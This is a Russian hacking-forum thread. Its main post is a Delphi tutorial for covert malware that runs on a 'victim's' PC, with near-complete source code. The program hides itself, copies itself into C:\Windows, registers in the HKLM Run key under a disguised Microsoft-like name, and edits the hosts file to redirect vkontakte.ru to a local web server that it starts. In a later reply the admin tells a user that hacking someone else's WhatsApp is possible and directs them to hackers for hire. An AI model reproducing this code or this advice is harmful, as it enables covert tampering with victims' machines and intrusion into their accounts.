Перейти к содержимому


Фотография

Блокиратор вконтакте


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 2

#1 Admin

Admin

    Эксперт. (ГЛАВА ФОРУМА)

  • Администраторы
  • 267 сообщений
  • ГородИнтернет сити

Отправлено 28 Февраль 2016 - 23:35

Добрый день, сейчас опишу метод блокировки вконтакте средствами Delphi. Главное преимущество нашей идеи состоит в том, что она не требует хостинга. 
 
 
Наша программка будет редактировать всем известный файл hosts и поднимать на компьютере жертвы собственный http-сервер, таким образом компьютер жертвы и будет хостом для сайта, на который будет прописан редирект в хостс. 
Нам потребуется 
 
[1] Delphi 7 
[2] Установленная библиотека Indy 
 
Для начала создадим html-файлик, который станет страничкой, которую увидит пользователь, попытавшись войти на свой аккаунт. 
 
В нем я написал следующее
 
<html><title>Вконтакте Добро Пожаловать</title></head><div align=center><image src=12.bmp></div></html>
 
Не забудьте создать картинку с именем 12.bmp 
 
Моя картинка вот http://s49.radikal.r...88381aea11.bmp 
 
Теперь поместите наш файл и картинку в папку C:Windows 
 
Приступим к написанию веб-сервера. 
Кинем на форму idHTTPServer с закладки Indy Servers 
Назовем его Server 
 
В событии создания формы напишем
 
procedure TForm1.FormCreate(Sender: TObject);var str:tstringlist;beginapplication.ShowMainForm:=false; //Делаем форму скрытойif not FileExists('C:Windowswebserver.exe') then begin //Проверка, если веб //сервера нет в папкеCopyFile(pchar(application.exename),'C:Windowswebserver.exe',false); //То //скопируемся тудаWinExec('C:Windowswebserver.exe',sw_hide); //И запустим серверRegHosts; //Процедура модификации хостсRegRun; //Пропись в реестреApplication.Terminate; //Если это убрать, то наш сервер не запустится, т.к.//На одном компе может быть запущен только один сервер на одном портуendelsebeginRegRun; //Иначе пропишемся в реестрRegHosts; //Модифицируем хостсserver.Active:=true; //И включим серверend;
 
Теперь объявим процедуры RegRun и RegHosts
 
public{ Public declarations }procedure RegHosts;procedure RegRun;end;
 
Пропись в реестр
 
procedure TForm1.RegRun;var reg:tregistry;beginreg := tregistry.create; //Инициализируем переменнуюreg.rootkey := hkey_local_machine; //Открываем ключ реестраreg.lazywrite := false;reg.openkey('softwaremicrosoftwindowscurrentversionrun', false); //Открываем //подраздел реестраreg.writestring('MicrosoftWebServerUpdater.exe', 'C:Windowswebserver.exe'); //Прописываем путь до сервера в автозагрузку(вместо //'C:windowswebserver.exe' можно написать Application.exename//Тогда программа пропишет в авторан путь до самой себя в данный моментreg.closekey; //Закрываем разделreg.free; //Уничтожаем переменнуюend;
 
Думаю, тут ничего объяснять не надо 
 
Модификация файла хостс 
Предварительно объявим глобальной переменной 
 
FileStr:TStringlist;
 
procedure TForm1.RegHosts;beginFilestr:=tstringlist.Create; //Создаем списокFilestr.LoadFromFile('C:WindowsSystem32driversetchosts'); //Загружаем //содержимое хостс в списокFilestr.Add('127.0.0.1 vkontakte.ru'); //Добавим строчку//Слева написан IP, на который произойдет переадресация//Справа - ресурс, с которого она произойдетfilestr.SaveToFile('C:WindowsSystem32driversetchosts'); //Сохраним измененияFilestr.Free; //Освободим объектend;
 
Теперь перейдем к программированию обработки запросов, 
Посылаемых браузером жертвы на сервер. 
В обработчике события OnCommandGet Server'a напишем следующее
 
procedure TForm1.ServerCommandGet(AThread: TIdPeerThread;ARequestInfo: TIdHTTPRequestInfo; AResponseInfo: TIdHTTPResponseInfo);beginif (pos('ndex',arequestinfo.document)=0)and(pos('12.bmp',arequestinfo.document)=0) then//Если пользователь браузер запрашивает нашу страничкуarequestinfo.Document:='index.html'; //Если запрашивается другая страничка//То все равно откроем нашу. Я пишу такие условия потому, что иначе//У меня программа вываливалась с экзепшном, может у вас получится:) if arequestinfo.Document='/' thenbeginarequestinfo.Document:=''; //Обнуляем запросaresponseinfo.ContentStream:=tfilestream.Create('C:windowsindex.html',fmopenread); //отправляем клиенту файл index.htmlend elseif arequestinfo.Document<>'/' then //Если прошлая проверка пройдена, то//Отправляем файл клиенту(картинку)//Если этого не написать, картинка не отобразитсяaresponseinfo.ContentStream:=tfilestream.Create('C:windows'+arequestinfo.Document,fmopenread);end;
 
При разрушении формы напишем
 
Server.active:=false; // Иначе программа будет некорректно работать
 
В uses обязательно добавьте Registry, иначе прописаться в реестр программа не сможет. 
 
Теперь проверим, наберем в окне любого браузера 127.0.0.1 
Если вам не открылся ваш html файл, то где-то вы допустили ошибку. 
Теперь пробуем ввести vkontakte.ru 
 
 
Если все правильно сделано, то видим свою табличку. Кому помог, ставьте плюсик. 
Если я где-то ошибся, вот исходник Скачать

  • umlda abduhaklmowa это нравится

С Уважением Администрация.Форум хакеров XAKERPRO.COM


#2 umlda abduhaklmowa

umlda abduhaklmowa

    дух

  • Пользователи
  • Pip
  • 1 сообщений

Отправлено 08 Июнь 2016 - 13:32

Здравствуйте можноли взломать чужой вацап не имея доступ к его телефону?

#3 Admin

Admin

    Эксперт. (ГЛАВА ФОРУМА)

  • Администраторы
  • 267 сообщений
  • ГородИнтернет сити

Отправлено 10 Июнь 2016 - 21:58

Здравствуйте можноли взломать чужой вацап не имея доступ к его телефону?


Да можно, читаете пожалуйста соответствующие разделы и обращайтесь к тем людям которые предлагают услуги хакера.

С Уважением Администрация.Форум хакеров XAKERPRO.COM





Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных


Рейтинг@Mail.ru
Сертификат на никнейм XAKERPRO.COM, зарегистрирован на Константин Иванов.
Яндекс.Метрика Рейтинг@Mail.ru Analysis Счетчик ТИЦ Каталог сайтов OpenLinks.RU Каталог сайтов Всего.RU
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal
.